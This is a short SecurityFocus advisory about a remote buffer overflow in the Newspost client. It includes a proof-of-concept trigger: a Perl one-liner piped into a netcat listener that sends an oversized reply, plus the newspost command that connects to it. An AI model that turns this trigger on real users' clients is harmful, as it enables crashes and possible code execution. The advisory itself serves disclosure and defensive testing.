Newspost Remote Buffer Overflow Vulnerability

No exploit is available, however a proof of concept to trigger the issue is available:
Create a server:
perl -e 'print "A" x 1024;print "BBBBCCCCDDDDEEEE"'| nc -v -l -p 119

Connect to it:
newspost -s test -i localhost -f me@me.nl -n news.news /etc/hosts

The following exploit has been made available:


 

Privacy Statement
Copyright 2010, SecurityFocus